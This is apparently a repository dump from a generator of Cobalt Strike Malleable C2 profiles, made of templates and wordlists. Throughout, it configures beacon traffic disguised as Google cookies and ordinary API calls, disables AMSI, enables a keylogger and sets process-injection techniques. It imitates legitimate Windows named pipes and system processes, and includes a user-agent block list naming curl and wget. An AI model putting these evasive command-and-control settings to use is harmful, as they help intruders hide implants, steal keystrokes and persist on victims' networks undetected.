    set C "${https_certificate_C}";
    set CN "${https_certificate_CN}";
    set O "${https_certificate_O}";
    set OU "${https_certificate_OU}";
    set validity "${https_certificate_V}";
}

##Valid SSL Certificates with SSL Beacon
##https-certificate {
##    set keystore "domain.store";
##    set password "mypassword";
##}

##DNS Beacons
##dns-beacon "optional-variant-name" {
##    # Options moved into 'dns-beacon' group in 4.3:
##    set dns_idle "1.2.3.4";
##    set dns_max_txt "199";
##    set dns_sleep "1";
##    set dns_ttl "5";
##    set maxdns "200";
##    set dns_stager_prepend "doc-stg-prepend";
##    set dns_stager_subhost "doc-stg-sh.";
##
##    # DNS subhost override options added in 4.3:
##    set beacon "doc.bc.";
##    set get_A "doc.1a.";
##    set get_AAAA "doc.4a.";
##    set get_TXT "doc.tx.";
##    set put_metadata "doc.md.";
##    set put_output "doc.po.";
##    set ns_response "zero";
##}

##Code Signing Certificate
##code-signer {
##    set keystore "keystore.jks";
##    set password 
"password"; 63 | ## set alias "server"; 64 | ##} 65 | 66 | ## Staging process 67 | set host_stage "${host_stage}"; 68 | 69 | http-stager { 70 | set uri_x86 "/webapi/v6/Update"; 71 | set uri_x64 "/webapi/v3/Update"; 72 | 73 | server { 74 | header "Content-Type" "application/octet-stream"; 75 | header "Connection" "Keep-Alive"; 76 | header "Server" "Apache"; 77 | output { 78 | #prepend " "; 79 | #append ""; 80 | print; 81 | 82 | } 83 | } 84 | 85 | client { 86 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 87 | } 88 | } 89 | 90 | ## SSH beacons 91 | ##Note that the format is word_##, where CS will auto include a two digit number in the "##" field. 92 | set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)"; 93 | set ssh_pipename "SearchText_##"; 94 | 95 | ##http-config 96 | http-config { 97 | set headers "Date,Server, Content-Length, Keep-Alive, 98 | Connection, Content-Type"; 99 | header "Server" "Apache"; 100 | header "Keep-Alive" "timeout=10, max=100"; 101 | header "Connection" "Keep-Alive"; 102 | 103 | #This option decides if Cobalt Strike uses the X-Forwarded-For HTTP header to determine the remote address of a request. 104 | #Use this option if your Cobalt Strike server is behind an HTTP redirector. 
105 | set trust_x_forwarded_for "true"; 106 | #By default, requests from user agents that start with curl, lynx, or wget are all blocked 107 | #set block_useragents "curl*,lynx*,wget*"; 108 | } 109 | 110 | ## Post Exploitation 111 | post-ex { 112 | set spawnto_x86 "%windir%\\syswow64\\WerFault.exe"; 113 | set spawnto_x64 "%windir%\\sysnative\\WerFault.exe"; 114 | set obfuscate "true"; 115 | set smartinject "true"; 116 | set amsi_disable "true"; 117 | set pipename "msrpc_####"; 118 | set keylogger "GetAsyncKeyState"; 119 | #set thread_hint ""; # specify as module!function+0x## 120 | } 121 | 122 | ## HTTP GET 123 | http-get { 124 | 125 | set uri "${http_get_uri}"; 126 | 127 | client { 128 | 129 | header "Accept-Encoding" "gzip, deflate"; 130 | header "Host" "${http_get_host}"; 131 | 132 | metadata { 133 | base64; 134 | prepend "session-token="; 135 | prepend "__Secure-3PAPISID=noskin;"; 136 | append "CONSENT=YES+CN.zh-CN+20210917-09-0"; 137 | header "Cookie"; 138 | } 139 | } 140 | 141 | server { 142 | 143 | header "Server" "${http_getReq_Server}"; 144 | header "Cache-Control" "private, max-age=0"; 145 | header "X-Frame-Options" "SAMEORIGIN"; 146 | header "Content-Encoding" "gzip"; 147 | 148 | output { 149 | print; 150 | } 151 | } 152 | } 153 | 154 | ## HTTP POST 155 | http-post { 156 | 157 | set uri "${http_post_uri}"; 158 | 159 | client { 160 | 161 | header "Accept" "*/*"; 162 | header "Content-Type" "${http_post_request_content}"; 163 | ${random_header} 164 | header "Host" "${http_post_host}"; 165 | 166 | parameter ${http_post_parameter1}; 167 | 168 | id { 169 | parameter "${http_post_id}"; 170 | } 171 | 172 | parameter ${http_post_parameter2}; 173 | 174 | output { 175 | ${http_post_encode} 176 | print; 177 | } 178 | } 179 | 180 | server { 181 | 182 | header "Server" "${http_post_server}"; 183 | header "Content-Type" "${http_post_response_content}"; 184 | header "Connection" "${Connection}"; 185 | header "X-Frame-Options" "SAMEORIGIN"; 186 | 187 | output { 188 | 
print; 189 | } 190 | } 191 | } -------------------------------------------------------------------------------- /src/main/resources/templates/c2profile_template4.2.ftl: -------------------------------------------------------------------------------- 1 | ## Cobalt Strike Malleable C2 Profile 2 | ## Version: Cobalt Strike 4.2 3 | ## Date : ${timestamp} 4 | 5 | ## Profile Name 6 | ##set sample_name "${sample_name}"; 7 | 8 | ## Sleep Times 9 | set sleeptime "${sleeptime}"; 10 | set jitter "${jitter}"; 11 | set data_jitter "${data_jitter}"; 12 | 13 | ## Beacon User-Agent 14 | set useragent "${useragent}"; 15 | 16 | ## Self-signed SSL Certificates with SSL Beacon 17 | ## Stager 18 | https-certificate { 19 | set C "${https_certificate_C}"; 20 | set CN "${https_certificate_CN}"; 21 | set O "${https_certificate_O}"; 22 | set OU "${https_certificate_OU}"; 23 | set validity "${https_certificate_V}"; 24 | } 25 | 26 | ## TCP Beacon 27 | set tcp_port "${tcp_port}"; 28 | set tcp_frame_header "\x80"; 29 | 30 | ## SMB beacons 31 | set pipename "mojo.5688.8052.183894939787088877##"; 32 | set pipename_stager "mojo.5688.8052.35780273329370473##"; 33 | set smb_frame_header "\x80"; 34 | 35 | ## DNS beacons 36 | set maxdns "${maxdns}"; 37 | set dns_max_txt "${dns_max_txt}"; 38 | set dns_idle "${dns_idle}"; 39 | set dns_sleep "${dns_sleep}"; 40 | set dns_stager_prepend "${dns_stager_prepend}"; 41 | set dns_stager_subhost "${dns_stager_subhost}"; 42 | 43 | ## SSH beacons 44 | set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)"; 45 | set ssh_pipename "wkssvc##"; 46 | 47 | #code-signer { 48 | # set keystore "keystore.jks"; 49 | # set password "123456"; 50 | # set alias "google"; 51 | #} 52 | 53 | ## Staging process 54 | set host_stage "${host_stage}"; 55 | http-stager { 56 | set uri_x86 "${stager_uri_x86}"; 57 | set uri_x64 "${stager_uri_x64}"; 58 | 59 | server { 60 | header "Content-Type" "${stager_server_ContentType}"; 61 | header "Server" "${stager_server_Server}"; 62 | 
${stager_server_header1} 63 | ${stager_server_header2} 64 | ${stager_server_header3} 65 | ${stager_server_header4} 66 | output { 67 | prepend "${stager_output_prepend}"; 68 | prepend "${stager_output_prepend2}"; 69 | append "${stager_output_append}"; 70 | print; 71 | } 72 | } 73 | 74 | client { 75 | header "Accept" "${stager_client_Accept}"; 76 | header "Accept-Language" "en-US,en;q=0.5"; 77 | header "Accept-Encoding" "gzip, deflate"; 78 | } 79 | } 80 | 81 | ## Post Exploitation 82 | post-ex { 83 | set spawnto_x86 "${spawnto_x86}"; 84 | set spawnto_x64 "${spawnto_x64}"; 85 | set obfuscate "true"; 86 | set smartinject "true"; 87 | set amsi_disable "true"; 88 | set pipename "${pipename}"; 89 | set keylogger "GetAsyncKeyState"; 90 | } 91 | 92 | <#--## Memory Indicators--> 93 | <#--stage {--> 94 | <#-- # CS 4.2 added allocator and MZ header overrides--> 95 | <#-- set allocator "VirtualAlloc";--> 96 | <#-- set magic_pe "NO";--> 97 | <#-- set userwx "false";--> 98 | <#-- set stomppe "true";--> 99 | <#-- set obfuscate "true";--> 100 | <#-- set cleanup "true";--> 101 | <#-- set sleep_mask "true";--> 102 | <#-- set smartinject "true";--> 103 | 104 | <#-- set checksum "0";--> 105 | <#-- set compile_time "11 Nov 2022 04:08:32";--> 106 | <#-- set entry_point "650688";--> 107 | <#-- set image_size_x86 "4661248";--> 108 | <#-- set image_size_x64 "4661248";--> 109 | <#-- set name "srv.dll";--> 110 | <#-- set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";--> 111 | 112 | <#-- transform-x86 {--> 113 | <#-- prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90";--> 114 | <#-- strrep 
"ReflectiveLoader" "execute";--> 115 | <#-- strrep "This program cannot be run in DOS mode" "";--> 116 | <#-- strrep "beacon.dll" "";--> 117 | <#-- }--> 118 | <#-- transform-x64 {--> 119 | <#-- prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90";--> 120 | <#-- strrep "ReflectiveLoader" "execute";--> 121 | <#-- strrep "beacon.x64.dll" "";--> 122 | <#-- }--> 123 | 124 | <#-- stringw "jQ"; # Add this string to the DLL--> 125 | <#--}--> 126 | 127 | <#--## Process Injection--> 128 | process-inject { 129 | 130 | set allocator "NtMapViewOfSection"; 131 | set min_alloc "17500"; 132 | set startrwx "false"; 133 | set userwx "false"; 134 | 135 | transform-x86 { 136 | prepend "\x90\x90"; 137 | } 138 | 139 | transform-x64 { 140 | prepend "\x90\x90"; 141 | append "\x90\x90"; 142 | } 143 | 144 | 145 | execute { 146 | # The order is important! Each step will be attempted (if applicable) until successful 147 | ## self-injection 148 | CreateThread "ntdll!RtlUserThreadStart+0x42"; 149 | CreateThread; 150 | ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s) 151 | # SetThreadContext; 152 | NtQueueApcThread-s; 153 | # CreateRemotThread - Vanilla cross process injection technique. 
Doesn't cross session boundaries 154 | CreateRemoteThread; 155 | # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries 156 | RtlCreateUserThread; 157 | } 158 | } 159 | 160 | ## HTTP Headers 161 | http-config { 162 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; 163 | header "Server" "Apache"; 164 | header "Keep-Alive" "timeout=10, max=100"; 165 | header "Connection" "Keep-Alive"; 166 | # Use this option if your teamserver is behind a redirector 167 | set trust_x_forwarded_for "true"; 168 | } 169 | 170 | ## HTTP GET 171 | http-get { 172 | 173 | set uri "${http_get_uri}"; 174 | set verb "GET"; 175 | 176 | client { 177 | 178 | header "Accept-Encoding" "gzip, deflate"; 179 | ${get_client_header1} 180 | ${get_client_header2} 181 | ${get_client_header3} 182 | ${get_client_header4} 183 | #header "Host" "${http_get_host}"; 184 | 185 | metadata { 186 | base64url; 187 | prepend "ANID="; 188 | prepend "__Secure-3PAPISID=noskin;"; 189 | append ";CONSENT=YES+CN.zh-CN+20210917-09-0"; 190 | header "Cookie"; 191 | } 192 | } 193 | 194 | server { 195 | 196 | header "Server" "${http_getReq_Server}"; 197 | header "Content-Type" "${http_getReq_ContentType}"; 198 | ${get_server_header1} 199 | ${get_server_header2} 200 | ${get_server_header3} 201 | ${get_server_header4} 202 | output { 203 | ${get_server_encode} 204 | prepend "${get_server_prepend}"; 205 | prepend "${get_server_prepend2}"; 206 | append "${get_server_append}"; 207 | print; 208 | } 209 | } 210 | } 211 | 212 | ## HTTP POST 213 | http-post { 214 | 215 | set uri "${http_post_uri}"; 216 | set verb "POST"; 217 | 218 | client { 219 | 220 | header "Content-Type" "${post_client_content}"; 221 | ${post_client_header1} 222 | ${post_client_header2} 223 | ${post_client_header3} 224 | ${post_client_header4} 225 | #header "Host" "${http_post_host}"; 226 | 227 | id { 228 | base64url; 229 | parameter "__formid"; 
230 | } 231 | 232 | ${post_client_parameter1} 233 | ${post_client_parameter2} 234 | ${post_client_parameter3} 235 | output { 236 | base64url; 237 | prepend "aid_=522005705&accver=1&showtype=embed&ua="; 238 | print; 239 | } 240 | } 241 | 242 | server { 243 | 244 | header "Server" "${post_server_server}"; 245 | header "Content-Type" "${post_server_content}"; 246 | ${post_server_header1} 247 | ${post_server_header2} 248 | ${post_server_header3} 249 | ${post_server_header4} 250 | output { 251 | ${post_server_encode} 252 | prepend "${post_server_prepend}"; 253 | prepend "${post_server_prepend2}"; 254 | append "${post_server_append}"; 255 | print; 256 | } 257 | } 258 | } 259 | -------------------------------------------------------------------------------- /src/main/resources/templates/c2profile_template4.4.ftl: -------------------------------------------------------------------------------- 1 | ## Cobalt Strike Malleable C2 Profile 2 | ## Version: Cobalt Strike 4.4 3 | ## Date : ${timestamp} 4 | 5 | ## Profile Name 6 | ##set sample_name "${sample_name}"; 7 | 8 | ## Sleep Times 9 | set sleeptime "${sleeptime}"; 10 | set jitter "${jitter}"; 11 | set data_jitter "${data_jitter}"; 12 | 13 | ## Beacon User-Agent 14 | set useragent "${useragent}"; 15 | 16 | ## Self-signed SSL Certificates with SSL Beacon 17 | ## Stager 18 | https-certificate { 19 | set C "${https_certificate_C}"; 20 | set CN "${https_certificate_CN}"; 21 | set O "${https_certificate_O}"; 22 | set OU "${https_certificate_OU}"; 23 | set validity "${https_certificate_V}"; 24 | } 25 | 26 | ## TCP Beacon 27 | set tcp_port "${tcp_port}"; 28 | set tcp_frame_header "\x80"; 29 | 30 | ## SMB beacons 31 | set pipename "mojo.5688.8052.183894939787088877##"; 32 | set pipename_stager "mojo.5688.8052.35780273329370473##"; 33 | set smb_frame_header "\x80"; 34 | 35 | ## DNS beacons 36 | dns-beacon { 37 | # Options moved into "dns-beacon" group in version 4.3 38 | set maxdns "${maxdns}"; 39 | set dns_max_txt "${dns_max_txt}"; 
40 | set dns_idle "${dns_idle}"; 41 | set dns_sleep "${dns_sleep}"; 42 | set dns_stager_prepend "${dns_stager_prepend}"; 43 | set dns_stager_subhost "${dns_stager_subhost}"; 44 | set dns_ttl "5"; 45 | 46 | # DNS subhosts override options, added in version 4.3 47 | set beacon "a.bc."; 48 | set get_A "b.1a."; 49 | set get_AAAA "c.4a."; 50 | set get_TXT "d.tx."; 51 | set put_metadata "e.md."; 52 | set put_output "f.po."; 53 | set ns_response "zero"; 54 | 55 | } 56 | 57 | 58 | ## SSH beacons 59 | set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)"; 60 | set ssh_pipename "wkssvc##"; 61 | 62 | #code-signer { 63 | # set keystore "keystore.jks"; 64 | # set password "123456"; 65 | # set alias "google"; 66 | #} 67 | 68 | ## Staging process 69 | set host_stage "${host_stage}"; 70 | http-stager { 71 | set uri_x86 "${stager_uri_x86}"; 72 | set uri_x64 "${stager_uri_x64}"; 73 | 74 | server { 75 | header "Content-Type" "${stager_server_ContentType}"; 76 | header "Server" "${stager_server_Server}"; 77 | ${stager_server_header1} 78 | ${stager_server_header2} 79 | ${stager_server_header3} 80 | ${stager_server_header4} 81 | output { 82 | prepend "${stager_output_prepend}"; 83 | prepend "${stager_output_prepend2}"; 84 | append "${stager_output_append}"; 85 | print; 86 | } 87 | } 88 | 89 | client { 90 | header "Accept" "${stager_client_Accept}"; 91 | header "Accept-Language" "en-US,en;q=0.5"; 92 | header "Accept-Encoding" "gzip, deflate"; 93 | } 94 | } 95 | 96 | ## Post Exploitation 97 | post-ex { 98 | set spawnto_x86 "${spawnto_x86}"; 99 | set spawnto_x64 "${spawnto_x64}"; 100 | set obfuscate "true"; 101 | set smartinject "true"; 102 | set amsi_disable "true"; 103 | set pipename "${pipename}"; 104 | set keylogger "GetAsyncKeyState"; 105 | } 106 | 107 | <#--## Memory Indicators--> 108 | <#--stage {--> 109 | <#-- # CS 4.2 added allocator and MZ header overrides--> 110 | <#-- set allocator "VirtualAlloc";--> 111 | <#-- set magic_pe "NO";--> 112 | <#-- set userwx "false";--> 113 | <#-- set 
stomppe "true";--> 114 | <#-- set obfuscate "true";--> 115 | <#-- set cleanup "true";--> 116 | <#-- set sleep_mask "true";--> 117 | <#-- set smartinject "true";--> 118 | 119 | <#-- set checksum "0";--> 120 | <#-- set compile_time "11 Nov 2022 04:08:32";--> 121 | <#-- set entry_point "650688";--> 122 | <#-- set image_size_x86 "4661248";--> 123 | <#-- set image_size_x64 "4661248";--> 124 | <#-- set name "srv.dll";--> 125 | <#-- set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";--> 126 | 127 | <#-- transform-x86 {--> 128 | <#-- prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90";--> 129 | <#-- strrep "ReflectiveLoader" "execute";--> 130 | <#-- strrep "This program cannot be run in DOS mode" "";--> 131 | <#-- strrep "beacon.dll" "";--> 132 | <#-- }--> 133 | <#-- transform-x64 {--> 134 | <#-- prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90";--> 135 | <#-- strrep "ReflectiveLoader" "execute";--> 136 | <#-- strrep "beacon.x64.dll" "";--> 137 | <#-- }--> 138 | 139 | <#-- stringw "jQ"; # Add this string to the DLL--> 140 | <#--}--> 141 | 142 | <#--## Process Injection--> 143 | process-inject { 144 | 145 | set allocator "NtMapViewOfSection"; 146 | set min_alloc "17500"; 147 | set startrwx "false"; 148 | set userwx "false"; 149 | 150 | transform-x86 { 151 | prepend "\x90\x90"; 152 | } 153 | 154 | transform-x64 { 155 | prepend "\x90\x90"; 156 | append "\x90\x90"; 157 | } 158 | 159 | 160 | execute { 161 | # The order is important! 
Each step will be attempted (if applicable) until successful 162 | ## self-injection 163 | CreateThread "ntdll!RtlUserThreadStart+0x42"; 164 | CreateThread; 165 | ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s) 166 | # SetThreadContext; 167 | NtQueueApcThread-s; 168 | # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries 169 | CreateRemoteThread; 170 | # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries 171 | RtlCreateUserThread; 172 | } 173 | } 174 | 175 | ## HTTP Headers 176 | http-config { 177 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; 178 | header "Server" "Apache"; 179 | header "Keep-Alive" "timeout=10, max=100"; 180 | header "Connection" "Keep-Alive"; 181 | # Use this option if your teamserver is behind a redirector 182 | set trust_x_forwarded_for "true"; 183 | set block_useragents "curl*,lynx*,wget*"; 184 | } 185 | 186 | ## HTTP GET 187 | http-get { 188 | 189 | set uri "${http_get_uri}"; 190 | set verb "GET"; 191 | 192 | client { 193 | 194 | header "Accept-Encoding" "gzip, deflate"; 195 | ${get_client_header1} 196 | ${get_client_header2} 197 | ${get_client_header3} 198 | ${get_client_header4} 199 | #header "Host" "${http_get_host}"; 200 | 201 | metadata { 202 | base64url; 203 | prepend "ANID="; 204 | prepend "__Secure-3PAPISID=noskin;"; 205 | append ";CONSENT=YES+CN.zh-CN+20210917-09-0"; 206 | header "Cookie"; 207 | } 208 | } 209 | 210 | server { 211 | 212 | header "Server" "${http_getReq_Server}"; 213 | header "Content-Type" "${http_getReq_ContentType}"; 214 | ${get_server_header1} 215 | ${get_server_header2} 216 | ${get_server_header3} 217 | ${get_server_header4} 218 | output { 219 | ${get_server_encode} 220 | prepend "${get_server_prepend}"; 221 | prepend "${get_server_prepend2}"; 222 | append "${get_server_append}"; 223 | print; 224 | } 225 | } 226 | } 
227 | 228 | ## HTTP POST 229 | http-post { 230 | 231 | set uri "${http_post_uri}"; 232 | set verb "POST"; 233 | 234 | client { 235 | 236 | header "Content-Type" "${post_client_content}"; 237 | ${post_client_header1} 238 | ${post_client_header2} 239 | ${post_client_header3} 240 | ${post_client_header4} 241 | #header "Host" "${http_post_host}"; 242 | 243 | id { 244 | base64url; 245 | parameter "__formid"; 246 | } 247 | 248 | ${post_client_parameter1} 249 | ${post_client_parameter2} 250 | ${post_client_parameter3} 251 | output { 252 | base64url; 253 | prepend "aid_=522005705&accver=1&showtype=embed&ua="; 254 | print; 255 | } 256 | } 257 | 258 | server { 259 | 260 | header "Server" "${post_server_server}"; 261 | header "Content-Type" "${post_server_content}"; 262 | ${post_server_header1} 263 | ${post_server_header2} 264 | ${post_server_header3} 265 | ${post_server_header4} 266 | output { 267 | ${post_server_encode} 268 | prepend "${post_server_prepend}"; 269 | prepend "${post_server_prepend2}"; 270 | append "${post_server_append}"; 271 | print; 272 | } 273 | } 274 | } 275 | -------------------------------------------------------------------------------- /src/main/resources/wordlists/dns_idle: -------------------------------------------------------------------------------- 1 | 223.5.5.5 2 | 8.8.4.4 3 | 8.8.8.8 4 | 101.226.4.6 5 | 114.114.114.114 6 | 119.29.29.29 7 | 223.6.6.6 8 | 114.114.115.115 9 | 114.114.114.119 10 | 9.9.9.9 11 | 149.112.112.112 -------------------------------------------------------------------------------- /src/main/resources/wordlists/dns_stager_prepend: -------------------------------------------------------------------------------- 1 | v=spf1 a:mail.google.com -all 2 | google-site-verification= 3 | microsoft-site-verification= 4 | amazon-site-verification= -------------------------------------------------------------------------------- /src/main/resources/wordlists/dns_stager_subhost: 
-------------------------------------------------------------------------------- 1 | .m.123456. 2 | .ftp.123456. 3 | .imap.123456. 4 | .pop.123456. 5 | .smtp.123456. 6 | .mail.123456. 7 | .webmail.123456. 8 | .blog.123456. 9 | .wiki.123456. 10 | .support.123456. 11 | .kb.123456. 12 | .help.123456. 13 | .go.123456. 14 | .static.123456. 15 | .api.123456. 16 | .dev.123456. 17 | .events.123456. 18 | .feeds.123456. 19 | .forums.123456. 20 | .groups.123456. 21 | .img.123456. 22 | .media.123456. 23 | .news.123456. 24 | .sites.123456. 25 | .admin.123456. 26 | .mysql.123456. 27 | .store.123456. 28 | .vpn.123456. 29 | .admin.123456. 30 | .beta.123456. 31 | .photos.123456. 32 | .files.123456. 33 | .resources.123456. 34 | .secure.123456. 35 | .ssl.123456. 36 | .apps.123456. 37 | .pic.123456. 38 | .status.123456. 39 | .mobile.123456. 40 | .search.123456. 41 | .live.123456. 42 | .videos.123456. 43 | .lists.123456. -------------------------------------------------------------------------------- /src/main/resources/wordlists/parameters: -------------------------------------------------------------------------------- 1 | srchtxt 2 | srchtype 3 | searchid 4 | ascdesc 5 | seltableid 6 | srchuid 7 | srchuname 8 | srchfrom 9 | srchfilter 10 | viewgroup 11 | fupid 12 | groupid 13 | parentid 14 | fup 15 | jointype 16 | gviewperm 17 | checkall 18 | srchuser 19 | targetlevel 20 | suid 21 | grouppwd 22 | recommend 23 | goto 24 | ordertype 25 | modthreadkey 26 | specialtype 27 | archiveid 28 | showoldetails 29 | showpic 30 | sortall 31 | searchsortid 32 | rewardtype 33 | searchsort 34 | forumdefstyle 35 | leftsidestatus 36 | checkrush 37 | stand 38 | viewpid 39 | ctid 40 | threadindex 41 | cedit 42 | infloat 43 | ajaxtarget 44 | readperm 45 | specialextra 46 | firstpid 47 | addtrade 48 | invitecode 49 | posttime 50 | aids 51 | display 52 | groupname 53 | selectname 54 | imgurl 55 | newthread 56 | uncheck 57 | wysiwyg 58 | operations 59 | sendreasonpm 60 | redirect 61 | location 62 | 
topiclist 63 | frommodcp 64 | request 65 | findpost 66 | noupdate 67 | nothumb 68 | searchkey 69 | apitype 70 | offlinestatus 71 | password 72 | newfee 73 | newnumber 74 | newbuyername 75 | newbuyercontact 76 | newbuyerzip 77 | newbuyerphone 78 | newbuyermobile 79 | newbuyermsg 80 | number 81 | transport 82 | buyermsg 83 | buyerzip 84 | buyerphone 85 | buyermobile 86 | buyername 87 | buyercontact 88 | offline 89 | nocache 90 | atid 91 | ap_id 92 | adv_title 93 | adv_url 94 | adv_image 95 | slide_sort 96 | adv_id 97 | ap_name 98 | ap_intro 99 | ap_class 100 | ap_display 101 | ap_height 102 | ap_width 103 | default_content 104 | ap_background_color 105 | user_notice 106 | template_code 107 | cash_min 108 | multiple 109 | poundage 110 | module_name 111 | is_menu 112 | is_control_auth 113 | is_dev 114 | module_picture 115 | module_id 116 | album_name 117 | aclass_id_array 118 | album_id 119 | pic_id_array 120 | album_cover 121 | fieldname 122 | fieldvalue 123 | pic_id 124 | short_title 125 | article_id_array 126 | commend_flag 127 | comment_flag 128 | attachment_path 129 | comment_count 130 | share_count 131 | consult_id 132 | consult_reply 133 | refund_express_company 134 | refund_shipping_no 135 | goods_group_id 136 | is_shipping_fee 137 | is_stock 138 | is_read 139 | apply_type -------------------------------------------------------------------------------- /src/main/resources/wordlists/pipename: -------------------------------------------------------------------------------- 1 | lsarpc_## 2 | samr_## 3 | netlogon_## 4 | wkssvc_## 5 | srvsvc_## 6 | mojo_## -------------------------------------------------------------------------------- /src/main/resources/wordlists/spawnto: -------------------------------------------------------------------------------- 1 | %windir%\\syswow64\\eventvwr.exe %windir%\\sysnative\\eventvwr.exe 2 | %windir%\\syswow64\\taskeng.exe %windir%\\sysnative\\taskeng.exe 3 | %windir%\\syswow64\\spoolsv.exe %windir%\\sysnative\\spoolsv.exe 4 | 
%windir%\\syswow64\\dllhost.exe %windir%\\sysnative\\dllhost.exe 5 | %windir%\\syswow64\\gpupdate.exe %windir%\\sysnative\\gpupdate.exe 6 | %windir%\\syswow64\\explorer.exe %windir%\\sysnative\\explorer.exe -------------------------------------------------------------------------------- /src/main/resources/wordlists/stager_uri: -------------------------------------------------------------------------------- 1 | /api/v2/datafeed /api/v3/datafeed 2 | /webapi/v6/Update /webapi/v3/Update 3 | /api/v1/canopy/check-socket /api/v2/canopy/check-socket 4 | /api/v3/commonservice /api/v5/commonservice 5 | /api/customization/favicon /api/customizationer/favicons 6 | /api/action/play/1/u573au666f1 /api/action/play/1/u573au666f2 7 | /api/v2/integrations/ceibal /api/v3/integrations/ceibal 8 | /api/v3/abtest/analytics/48fd0ae5-5d7e-4cab-afcf-c4cc42f24855 /api/v2/abtest/analytics/48fd0ae5-5d7e-4cab-afcf-c4cc42f24855 9 | /api/v1/frontend/error /api/v3/frontend/error 10 | /api/v1/user/ticket /api/v2/user/ticket -------------------------------------------------------------------------------- /src/main/resources/wordlists/useragents: -------------------------------------------------------------------------------- 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 2 | Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) CriOS/46.0.850.0 Mobile/40I689 Safari/536.1 3 | Mozilla/5.0 (iPad; CPU iPad OS 9_3_5 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) CriOS/63.0.888.0 Mobile/87Y454 Safari/535.0 4 | Mozilla/5.0 (iPad; CPU iPad OS 6_1_6 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) FxiOS/17.5d2973.0 Mobile/56S750 Safari/536.1 5 | Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/604.1.28 (KHTML, like Gecko) CriOS/96.0.4664.53 Mobile/14E5239e Safari/602.1 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 
Safari/537.36 Edge/18.17763
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/31.0.1650.18 Mobile/11B554a Safari/8536.25
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/4.0)
Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/4.0)
Mozilla/5.0 (iPad; CPU iPad OS 10_3_4 like Mac OS X) AppleWebKit/535.1 (KHTML, like Gecko) CriOS/14.0.860.0 Mobile/48W083 Safari/535.1
Mozilla/5.0 (iPad; CPU iPad OS 6_1_6 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/26.0.861.0 Mobile/13D727 Safari/531.1
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/48.0.852.0 Safari/534.2
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/5.0)
Opera/8.98.(Windows CE; ko-KR) Presto/2.9.170 Version/11.00
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 4.0; Trident/4.0)
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19577
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
